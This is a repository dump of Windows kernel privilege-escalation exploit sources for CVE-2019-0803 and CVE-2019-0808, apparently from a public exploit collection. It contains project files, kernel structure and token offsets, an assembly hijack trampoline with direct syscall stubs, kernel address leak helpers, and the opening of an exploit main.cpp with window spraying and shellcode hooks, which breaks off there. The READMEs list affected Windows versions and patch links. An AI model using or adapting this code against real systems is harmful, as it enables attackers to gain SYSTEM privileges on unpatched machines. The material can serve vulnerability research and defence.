</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="stdafx.h" />
<ClInclude Include="struct.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="DDE.cpp" />
<ClCompile Include="main.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<CustomBuild Include="x64.asm">
<FileType>Document</FileType>
<DeploymentContent Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</DeploymentContent>
<Command Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> ml64 /Fo $(IntDir)%(fileName).obj /c %(fileName).asm</Command>
<Outputs Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">$(IntDir)%(fileName).obj</Outputs>
</CustomBuild>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

44
00-CVE_EXP/CVE-2019-0803/poc_test/poc_test.vcxproj.filters Normal file
View File

@ -0,0 +1,44 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="struct.h">
<Filter>头文件</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="DDE.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="main.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<CustomBuild Include="x64.asm">
<Filter>源文件</Filter>
</CustomBuild>
</ItemGroup>
</Project>

4
00-CVE_EXP/CVE-2019-0803/poc_test/poc_test.vcxproj.user Normal file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

BIN
00-CVE_EXP/CVE-2019-0803/poc_test/stdafx.cpp Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2019-0803/poc_test/stdafx.h Normal file
View File

Binary file not shown.

154
00-CVE_EXP/CVE-2019-0803/poc_test/struct.h Normal file
View File

@ -0,0 +1,154 @@
#pragma once
#define DDE_SERVER_APP_NAME L"MyDDEService"
#define DDE_SERVER_TOPIC_NAME L"Topic"
#define DDE_SERVER_ITEM_NAME L"Item"
#define DDE_SERVER_WINDOW_CAPTION L"DDEServerPoc"
#define DDE_CLIENT_WINDOW_CAPTION L"DDEClientPoc"
#define MSG_DDESERVER_EXIT WM_USER + 1
#define MSG_DDESERVER_SET_GDI_OBJ_ADDR WM_USER + 2
#define LENGTH_TAGWND 0x128
#define OFFSET_SPWNDPARENT_WIN7 0x58
#define OFFSET_STRNAME_WIN7 0xD8
#define OFFSET_CBWNDEXTRA_WIN7 0xE8
#define OFFSET_APCADDR_WIN7 0x50
#define OFFSET_APCEPROCESS_WIN7 0x20
#define OFFSET_SECTOKEN_WIN7 0x208
#define OFFSET_EPROCESSPID_WIN7 0x180
#define OFFSET_EPROCESSBLINK_WIN7 0x188
typedef struct _HANDLEENTRY {
PVOID phead;
PVOID pOwner;
BYTE bType;
BYTE bFlags;
WORD wUniq;
} HANDLEENTRY, * PHANDLEENTRY;
typedef struct _SERVERINFO {
WORD wRIPFlags;
WORD wSRVIFlags;
WORD wRIPPID;
WORD wRIPError;
ULONG cHandleEntries;
} SERVERINFO, * PSERVERINFO;
typedef struct _SHAREDINFO {
PSERVERINFO psi;
PHANDLEENTRY aheList;
ULONG HeEntrySize;
} SHAREDINFO, * PSHAREDINFO;
typedef struct _LARGE_STRING {
ULONG Length;
ULONG MaximumLength : 31;
ULONG bAnsi : 1;
PVOID Buffer;
} LARGE_STRING, * PLARGE_STRING;
typedef struct _PEB
{
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
union
{
BOOLEAN BitField;
struct
{
BOOLEAN ImageUsesLargePages : 1;
BOOLEAN IsProtectedProcess : 1;
BOOLEAN IsLegacyProcess : 1;
BOOLEAN IsImageDynamicallyRelocated : 1;
BOOLEAN SkipPatchingUser32Forwarders : 1;
BOOLEAN SpareBits : 3;
};
};
HANDLE Mutant;
PVOID ImageBaseAddress;
PVOID Ldr;
PVOID ProcessParameters;
PVOID SubSystemData;
PVOID ProcessHeap;
PRTL_CRITICAL_SECTION FastPebLock;
PVOID AtlThunkSListPtr;
PVOID IFEOKey;
union
{
ULONG CrossProcessFlags;
struct
{
ULONG ProcessInJob : 1;
ULONG ProcessInitializing : 1;
ULONG ProcessUsingVEH : 1;
ULONG ProcessUsingVCH : 1;
ULONG ProcessUsingFTH : 1;
ULONG ReservedBits0 : 27;
};
ULONG EnvironmentUpdateCount;
};
union
{
PVOID KernelCallbackTable;
PVOID UserSharedInfoPtr;
};
} PEB, * PPEB;
typedef struct _CLIENT_ID {
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
typedef struct _TEB
{
NT_TIB NtTib;
PVOID EnvironmentPointer;
CLIENT_ID ClientId;
PVOID ActiveRpcHandle;
PVOID ThreadLocalStoragePointer;
PPEB ProcessEnvironmentBlock;
ULONG LastErrorValue;
ULONG CountOfOwnedCriticalSections;
PVOID CsrClientThread;
PVOID Win32ThreadInfo;
}TEB, * PTEB;
typedef
PVOID
(WINAPI* pfRtlAllocateHeap)(
PVOID HeapHandle,
ULONG Flags,
SIZE_T Size
);
extern "C"
HACCEL
NtUserCreateAcceleratorTable(
LPACCEL Entries,
ULONG EntriesCount
);
extern "C"
BOOL
NtUserShowWindow(
IN HWND hwnd,
IN int nCmdShow
);
extern "C"
HDC
NtUserBeginPaint(
IN HWND hwnd,
OUT LPPAINTSTRUCT lpPaint
);
extern "C"
BOOL
NtUserDestroyWindow(
IN HWND hwnd
);

BIN
00-CVE_EXP/CVE-2019-0803/poc_test/targetver.h Normal file
View File

Binary file not shown.

50
00-CVE_EXP/CVE-2019-0803/poc_test/x64.asm Normal file
View File

@ -0,0 +1,50 @@
EXTERN g_ClientCopyDDEIn1_ContinueAddr:DQ;
EXTERN g_BitMapAddr:DQ;
.CODE ;; ´úÂë¶Î
HijackTrampoFunc PROC
push r8
lea rax,[rsp+50h]
mov r8,qword ptr g_BitMapAddr
mov qword ptr [rax+30h],r8
mov r8,qword ptr [rax+20h]
mov byte ptr [r8+2],2
pop r8
pop rax
xor r8d,r8d
mov r11d,eax
lea rcx,[rsp+20h]
lea edx,[r8+18h]
jmp qword ptr g_ClientCopyDDEIn1_ContinueAddr
HijackTrampoFunc ENDP
NtUserCreateAcceleratorTable PROC
mov r10,rcx
mov eax,10F1h
syscall
ret
NtUserCreateAcceleratorTable ENDP
NtUserShowWindow PROC
mov r10,rcx
mov eax,1058h
syscall
ret
NtUserShowWindow ENDP
NtUserBeginPaint PROC
mov r10,rcx
mov eax,1017h
syscall
ret
NtUserBeginPaint ENDP
NtUserDestroyWindow PROC
mov r10,rcx
mov eax,109dh
syscall
ret
NtUserDestroyWindow ENDP
END

BIN
00-CVE_EXP/CVE-2019-0808/CVE-2019-0808_x32.exe Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2019-0808/CVE-2019-0808_x64.exe Normal file
View File

Binary file not shown.

44
00-CVE_EXP/CVE-2019-0808/README.md Normal file
View File

@ -0,0 +1,44 @@
### CVE-2019-0808
#### 描述
Win32k特权提升漏洞
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows 7 | x64/x86 | | SP1 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808
```
#### 利用方式
编译环境
- 编译有点问题
测试机器为Windows 7 SP1 x86
![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0808_win_7_sp1_x86.gif)
#### 分析文章
- https://paper.seebug.org/856/
- https://xz.aliyun.com/t/5142
- http://www.lahonja.me/2019/10/10/CVE-2019-0808%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90/
- https://blog.knownsec.com/2020/11/cve-2019-0808-%E4%BB%8E%E7%A9%BA%E6%8C%87%E9%92%88%E8%A7%A3%E5%BC%95%E7%94%A8%E5%88%B0%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/
#### 代码来源
- [DreamoneOnly](https://github.com/DreamoneOnly/CVE-2019-0808-32-64-exp)

45
00-CVE_EXP/CVE-2019-0808/README_EN.md Normal file
View File

@ -0,0 +1,45 @@
### CVE-2019-0808
#### Describe
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows 7 | x64/x86 | | SP1 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808
```
#### Utilization
CompilerEnvironment
- Compile a bit problem
Test machine for Windows 7 SP1 X86
![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0808_win_7_sp1_x86.gif)
#### Analyze
- https://paper.seebug.org/856/
- https://xz.aliyun.com/t/5142
- http://www.lahonja.me/2019/10/10/CVE-2019-0808%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90/
- https://blog.knownsec.com/2020/11/cve-2019-0808-%E4%BB%8E%E7%A9%BA%E6%8C%87%E9%92%88%E8%A7%A3%E5%BC%95%E7%94%A8%E5%88%B0%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/
#### ProjectSource
- [DreamoneOnly](https://github.com/DreamoneOnly/CVE-2019-0808-32-64-exp)

32
00-CVE_EXP/CVE-2019-0808/src/CVE-2019-0808.filters Normal file
View File

@ -0,0 +1,32 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="leak.h">
<Filter>头文件</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<None Include="shellcode.asm">
<Filter>源文件</Filter>
</None>
</ItemGroup>
</Project>

31
00-CVE_EXP/CVE-2019-0808/src/CVE-2019-0808.sln Normal file
View File

@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30002.166
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2019-0808", "CVE-2019-0808.vcxproj", "{B0FB7442-A04B-426B-B023-6C012057A99A}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B0FB7442-A04B-426B-B023-6C012057A99A}.Debug|x64.ActiveCfg = Debug|x64
{B0FB7442-A04B-426B-B023-6C012057A99A}.Debug|x64.Build.0 = Debug|x64
{B0FB7442-A04B-426B-B023-6C012057A99A}.Debug|x86.ActiveCfg = Debug|Win32
{B0FB7442-A04B-426B-B023-6C012057A99A}.Debug|x86.Build.0 = Debug|Win32
{B0FB7442-A04B-426B-B023-6C012057A99A}.Release|x64.ActiveCfg = Release|x64
{B0FB7442-A04B-426B-B023-6C012057A99A}.Release|x64.Build.0 = Release|x64
{B0FB7442-A04B-426B-B023-6C012057A99A}.Release|x86.ActiveCfg = Release|Win32
{B0FB7442-A04B-426B-B023-6C012057A99A}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {5D6EBAB6-350E-44BA-BCEF-2C825755A824}
EndGlobalSection
EndGlobal

4
00-CVE_EXP/CVE-2019-0808/src/CVE-2019-0808.user Normal file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

162
00-CVE_EXP/CVE-2019-0808/src/CVE-2019-0808.vcxproj Normal file
View File

@ -0,0 +1,162 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<ProjectGuid>{B0FB7442-A04B-426B-B023-6C012057A99A}</ProjectGuid>
<RootNamespace>win8test</RootNamespace>
<WindowsTargetPlatformVersion>7.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="leak.h" />
</ItemGroup>
<ItemGroup>
<MASM Include="x64.asm">
<FileType>Document</FileType>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
</MASM>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>

4
00-CVE_EXP/CVE-2019-0808/src/CVE-2019-0808.vcxproj.user Normal file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

202
00-CVE_EXP/CVE-2019-0808/src/leak.h Normal file
View File

@ -0,0 +1,202 @@
#pragma once
#include<windows.h>
/*
Microsoft_Code_Name Windows_10_Version Microsoft_Marketing_Name Release_Date
Threshold 1 (TH1) 1507 ------ July 2015
Threshold 2 (TH2) 1511 ------ November 2015
Redstone 1 (RS1) 1607 Anniversary Update August 2016
Redstone 2 (RS2) 1703 Creators Update April 2017
Redstone 3 (RS3) 1709 Fall Creators Update October 2017
Redstone 4 (RS4) 1803 April 2018 Update April 2018
*/
typedef enum _HANDLE_TYPE
{
TYPE_FREE = 0,
TYPE_WINDOW = 1,
TYPE_MENU = 2,
TYPE_CURSOR = 3,
TYPE_SETWINDOWPOS = 4,
TYPE_HOOK = 5,
TYPE_CLIPDATA = 6,
TYPE_CALLPROC = 7,
TYPE_ACCELTABLE = 8,
TYPE_DDEACCESS = 9,
TYPE_DDECONV = 10,
TYPE_DDEXACT = 11,
TYPE_MONITOR = 12,
TYPE_KBDLAYOUT = 13,
TYPE_KBDFILE = 14,
TYPE_WINEVENTHOOK = 15,
TYPE_TIMER = 16,
TYPE_INPUTCONTEXT = 17,
TYPE_HIDDATA = 18,
TYPE_DEVICEINFO = 19,
TYPE_TOUCHINPUTINFO = 20,
TYPE_GESTUREINFOOBJ = 21,
TYPE_CTYPES,
TYPE_GENERIC = 255
} HANDLE_TYPE, * PHANDLE_TYPE;
typedef struct _GdiCell
{
PVOID pKernelAddress;
UINT16 wProcessIdl;
UINT16 wCount;
UINT16 wUpper;
UINT16 uType;
PVOID pUserAddress;
}GdiCell, * pGdiCell;
typedef struct _HandleEntry
{
PULONG_PTR phead;
PULONG_PTR pOwner;
BYTE bType;
BYTE bFlalgs;
USHORT wUniq;
}HandleEntry, * pHandleEntry;
typedef struct _tagServerInfo
{
ULONG dwSRVIFlags;
ULONG_PTR cHandleEntries;
//...
}tagServerInfo, * ptagServerInfo;
typedef struct _tagSharedInfo
{
ptagServerInfo psi;
pHandleEntry aheList;
//...
}tagSharedInfo, * PtagSharedInfo;
using _xxxHmValidateHandle = PVOID(__fastcall*)(HANDLE hwnd, HANDLE_TYPE handleType);
class leak
{
public:
leak();
~leak() {};
PVOID GetGdiKernelAddress(HANDLE hGdi); // RS1之前可用用于GDI Object
PVOID GetUserObjectAddressBygSharedInfo(HANDLE hWnd,PULONG_PTR UserAddr); // RS2之前可用用于User Obejct
_xxxHmValidateHandle HmValidateHandle; // RS4之前可用返回在用户层映射的地址用于User Object可以根据heap->pSelf找到内核地址
private:
void GetGdiSharedHandleTable();
void Get_gSharedInfo_ulClientDelta();
void GetXXXHmValidateHandle();
private:
pGdiCell GdiSharedHandleTable;
ULONG_PTR g_DeltaDesktopHeap;
PtagSharedInfo gSharedInfo;
};
leak::leak()
{
GetXXXHmValidateHandle();
GetGdiSharedHandleTable();
Get_gSharedInfo_ulClientDelta();
}
void leak::GetXXXHmValidateHandle()
{
auto hModule = LoadLibrary(L"user32.dll");
auto func = GetProcAddress(hModule, "IsMenu");
for (size_t i = 0; i < 0x1000; i++)
{
BYTE* test = (BYTE*)func + i;
if (*test == 0xE8)
{
#ifdef _AMD64_
ULONG_PTR tmp = (ULONG_PTR)((ULONG_PTR) * (PULONG)(test + 1) | 0xffffffff00000000);
#else
ULONG_PTR tmp = (ULONG_PTR)* (PULONG)(test + 1);
#endif
HmValidateHandle = (_xxxHmValidateHandle)(test + tmp + 5);
break;
}
}
return ;
}
void leak::GetGdiSharedHandleTable()
{
PULONG_PTR teb = (PULONG_PTR)NtCurrentTeb();
#ifdef _AMD64_
PULONG_PTR peb = *(PULONG_PTR*)((PBYTE)teb + 0x60);
GdiSharedHandleTable = (pGdiCell)*(PULONG_PTR*)((PBYTE)peb + 0xf8);
#else
PULONG_PTR peb = *(PULONG_PTR*)((PBYTE)teb + 0x30);
GdiSharedHandleTable = (pGdiCell)*(PULONG_PTR*)((PBYTE)peb + 0x94);
#endif
return;
}
void leak::Get_gSharedInfo_ulClientDelta()
{
auto pMenu = CreateMenu();
/* get g_DeltaDesktopHeap */
ULONG_PTR Teb = (ULONG_PTR)NtCurrentTeb();
#ifdef _AMD64_
g_DeltaDesktopHeap = *(ULONG_PTR*)(Teb + 0x800 + 0x28); //teb->Win32ClientInfo.ulClientDelta
#else
g_DeltaDesktopHeap = *(ULONG_PTR*)(Teb + 0x6CC + 0x1C);
#endif
auto hModule = GetModuleHandleW(L"user32.dll");
gSharedInfo = reinterpret_cast<PtagSharedInfo>(GetProcAddress(hModule, "gSharedInfo"));
DestroyMenu(pMenu);
}
PVOID leak::GetGdiKernelAddress(HANDLE hGdi)
{
return (GdiSharedHandleTable + LOWORD(hGdi))->pKernelAddress;
}
PVOID leak::GetUserObjectAddressBygSharedInfo(HANDLE hWnd, PULONG_PTR UserAddr)
{
PVOID ret = nullptr;
pHandleEntry tmp = nullptr;
for (ULONG_PTR i = 0; i < gSharedInfo->psi->cHandleEntries; i++)
{
tmp = gSharedInfo->aheList + i;
HANDLE handle = reinterpret_cast<HANDLE>(tmp->wUniq << 0x10 | i);
if (handle == hWnd)
{
ret = tmp->phead;
if (UserAddr != NULL)
{
*UserAddr = (ULONG_PTR)ret - g_DeltaDesktopHeap;
}
}
}
return ret;
}

481
00-CVE_EXP/CVE-2019-0808/src/main.cpp Normal file
View File

@ -0,0 +1,481 @@
#include<Windows.h>
#include<iostream>
#include<intrin.h>
#include"leak.h"
using namespace std;
//////////////////////////////////////////////////////////////////////////////////
//
// global variables && prototypes
//
leak p_leak;
DWORD g_MenuCreate = NULL;
bool bOnDrag = false;
PVOID g_fakeWnd = nullptr;
ULONG_PTR g_uDraggingIndex = NULL;
PVOID g_primaryWnd = NULL;
PVOID g_secondWnd = NULL;
HWND g_SparyWindow[0x100] = { 0 };
HWND g_prepareToRead;
PVOID prepareToRead_addr;
#define MN_FINDMENUWINDOWFROMPOINT 0x1EB
void replaceWndProc();
void SetNullPageData();
EXTERN_C void ShellCode();
#ifdef _AMD64_
using pNtAllocateVirtualMemory = NTSTATUS(__fastcall*)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
EXTERN_C void __fastcall NtUserMNDragOver(PPOINT pt, char* buf);
#else
